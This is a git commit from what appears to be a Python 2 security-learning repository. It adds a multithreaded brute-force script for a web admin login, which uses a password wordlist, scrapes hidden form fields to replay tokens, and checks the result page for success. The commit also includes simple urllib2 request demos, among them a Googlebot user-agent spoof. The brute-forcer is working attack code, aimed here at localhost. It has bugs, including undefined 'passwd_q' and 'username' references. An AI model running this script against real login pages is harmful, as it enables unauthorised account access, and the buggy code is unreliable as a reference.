urllib2 simple scripts

This commit is contained in:
Mari Wahl 2014-12-30 11:10:39 -05:00
parent ac8064080f
commit 735f5804f1
161 changed files with 16521413 additions and 25 deletions

View file

@@ -3,3 +3,113 @@
__author__ = "bt3"
import urllib2
import urllib
import cookielib
import threading
import sys
import Queue
from HTMLParser import HTMLParser
from brute_forcing_locations import build_wordlist
# number of worker threads to spawn for the brute force
THREAD = 10
USERNAME = 'admin'
# wordlist of candidate passwords, one per line
WORDLIST = '../files_and_dir_lists/passwords/cain.txt'
RESUME = None
# where the script downloads and parses the HTML login form
TARGET_URL = 'http://localhost:80/admininstrator/index.php'
# where to submit the brute-force POST
TARGET_POST = 'http://localhost:80/admininstrator/index.php'
USERNAME_FIELD = 'username'
PASSWORD_FIELD = 'passwd'
# string checked for after each brute-force attempt to determine success
# NOTE(review): constant keeps its original misspelled name ("SUCESS")
# because other code in this file references it
SUCESS_CHECK = 'Administration - Control Panel'
class Bruter(object):
def __init__(self, username, words):
self.username = username
self.password_q = words
self.found = False
print 'Finished setting up for: ' + username
def run_bruteforce(self):
for i in range(THREAD):
t = threading.Thread(target=self.web_bruter)
t.start()
def web_bruter(self):
while not self.password_q.empty() and not self.found:
brute = self.password_q.get().rstrip()
# after we grab our password attempt, we set the cookie jar,
# and this calss will store cookies in the cookies file
jar = cookielib.FileCookieJar('cookies')
# initialize the urllib2 opener
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
response = opener.open(TARGET_URL)
page = response.read()
print "Trying: %s : %s (%d left)" %(self.username, brute, \
self.passwd_q.qsize())
# parse out the hidden fields
# make the initial request to retrieve the login form
# when we have the raw html we pass it off our html parser
# and call its feed method, which returns a dictionary of all
# the retrieved form elements
parser = BruteParser()
parser.feed(page)
post_tags = parser.tag_results
# add our username and password fields
post_tags[USERNAME_FIELD] = self.username
post_tags[PASSWORD_FIELD] = brute
# URL encode the POST variables and pass it to the
# HTTP request
login_data = urllib.urlencode(post_tags)
login_response = opener.open(TARGET_POST, login_data)
login_result = login_response.read()
if SUCESS_CHECK in login_result:
self.found = True
print '[*] Bruteforce successful.'
print '[*] Username: ' + username
print '[*] Password: ' + brute
print '[*] Waiting for the other threads to exit...'
# Core of our HTML processing: the HTML parsing class used against the
# target. It collects every <input> element on the login page so hidden
# fields (tokens, etc.) can be replayed in the brute-force POST.
class BruteParser(HTMLParser):
    def __init__(self):
        HTMLParser.__init__(self)
        # dictionary mapping each input's name attribute to its value
        self.tag_results = {}

    def handle_starttag(self, tag, attrs):
        """Called by HTMLParser for every opening tag; record <input> fields."""
        # we are only looking for input tags
        if tag == 'input':
            tag_name = None
            tag_value = None
            for name, value in attrs:
                if name == 'name':
                    tag_name = value
                if name == 'value':
                    tag_value = value
            if tag_name is not None:
                # BUGFIX: the original stored 'value' -- the value of the
                # LAST attribute the loop happened to see -- instead of the
                # input's actual 'value' attribute captured in tag_value.
                self.tag_results[tag_name] = tag_value
if __name__ == '__main__':
    # Build the password queue from the wordlist, then launch the
    # threaded attack against the configured target.
    password_queue = build_wordlist(WORDLIST)
    bruter = Bruter(USERNAME, password_queue)
    bruter.run_bruteforce()

View file

@@ -1,25 +0,0 @@
#!/usr/bin/env python
__author__ = "bt3"
import urllib2
def get(url):
msg = urllib2.urlopen(url)
print msg.read()
def get_user_agent(url):
headers = {}
headers['User-Agent'] = 'Googlebot'
request = urllib2.Request(url, headers=headers)
response = urllib2.urlopen(request)
print response.read()
response.close()
if __name__ == '__main__':
    # Demo: fetch Google's front page with a spoofed user agent.
    HOST = 'http://www.google.com'
    get_user_agent(HOST)

View file

@@ -0,0 +1,76 @@
#!/usr/bin/env python
__author__ = "bt3"
import urllib2
import urllib
def post_general(url):
values = {'name' : 'Dana Scullt',
'location' : 'Virginia',
'language' : 'Python' }
data = urllib.urlencode(values)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
print response.read()
def get_general(url):
msg = urllib2.urlopen(url)
print msg.read()
def get_fancy(url):
response = urllib2.urlopen(url)
print 'RESPONSE:', response
print 'URL :', response.geturl()
headers = response.info()
print 'DATE :', headers['date']
print 'HEADERS :'
print '---------'
print headers
data = response.read()
print 'LENGTH :', len(data)
print 'DATA :'
print '---------'
print data
def get_user_agent(url):
headers = {}
headers['User-Agent'] = 'Googlebot'
request = urllib2.Request(url, headers=headers)
request = urllib2.Request('http://www.google.com/')
request.add_header('Referer', 'http://www.python.org/')
request.add_header('User-agent', 'Mozilla/5.0')
response = urllib2.urlopen(request)
#print response.read()
print "The Headers are: ", response.info()
print "The Date is: ", response.info()['date']
print "The Server is: ", response.info()['server']
response.close()
def error(url):
request = urllib2.Request('http://aaaaaa.com')
try:
urllib2.urlopen(request)
except urllib2.URLError, e:
print e.reason
if __name__ == '__main__':
    HOST = 'http://www.google.com'
    # Only the error-handling demo runs; uncomment any of the others
    # to try them against HOST.
    #post_general(HOST)
    #get_general(HOST)
    #get_fancy(HOST)
    #get_user_agent(HOST)
    error(HOST)